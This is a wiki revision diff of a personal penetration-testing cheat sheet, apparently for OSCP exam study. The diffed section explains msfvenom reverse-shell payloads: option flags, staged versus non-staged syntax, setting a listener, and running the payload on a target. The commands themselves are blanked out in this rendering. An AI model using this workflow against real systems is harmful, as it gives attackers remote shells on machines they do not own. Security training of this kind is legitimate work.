cheat_sheets_various
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
cheat_sheets_various [2024/02/04 02:48] – [Reverse Shell Payload] gman | cheat_sheets_various [2024/02/04 03:05] (current) – [net commands (Windows)] gman | ||
---|---|---|---|
Line 322: | Line 322: | ||
===== msfvenom ===== | ===== msfvenom ===== | ||
- | ==== Reverse Shell Payload ==== | + | To see the available payloads: '' |
+ | * [[https:// | ||
- | To see the available payloads: '' | + | First, build a payload with MSFVenom |
- | • Filter by piping to grep | + | |
- | • [[https:// | + | |
- | + | ||
- | + | ||
- | First, build a payload with MSFVenom: | + | |
< | < | ||
Line 336: | Line 332: | ||
# | # | ||
# -p = payload | # -p = payload | ||
- | # LHOST = our local host IP address (this is your machine' | + | # LHOST = local host IP address (this is your machine' |
- | # LPORT = the port to listen on (this is the port on your machine) | + | # LPORT = local port to listen on (this is the port on your machine) |
# -f = format (of the output) | # -f = format (of the output) | ||
# R = export the payload in raw format | # R = export the payload in raw format | ||
Line 343: | Line 339: | ||
A **staged** payload will follow this syntax (note the delimiter): | A **staged** payload will follow this syntax (note the delimiter): | ||
- | * '' | + | * '' |
- | * '' | + | * '' |
| | ||
A **non-staged** payload will follow this syntax: | A **non-staged** payload will follow this syntax: | ||
- | * '' | + | * '' |
* '' | * '' | ||
After that set up a listener on your attach machine: | After that set up a listener on your attach machine: | ||
- | < | + | < |
Then copy and paste the msfvenom payload into the target box and run it. You should get a reverse shell on your attack machine. | Then copy and paste the msfvenom payload into the target box and run it. You should get a reverse shell on your attack machine. | ||
Line 358: | Line 354: | ||
---- | ---- | ||
- | ==== Notes ==== | + | ===== net commands (Windows) ===== |
- | **To-Do:** https:// | + | stuff |
+ | 1 | ||
+ | ---- | ||
- | **Source:** https:// | ||
- | |||
- | **Advice:** I intend to use some features of Metasploit for as many machines as I want on the exam. You really owe it to yourself to read the oscp-exam-guide regarding msfvenom. | ||
- | |||
- | **Additional: | ||
- | * msfvenom cheatsheet: https:// | ||
- | * To see all available payloads: '' | ||
- | |||
- | ---- | ||
===== ping ===== | ===== ping ===== |
cheat_sheets_various.1707014910.txt.gz · Last modified: by gman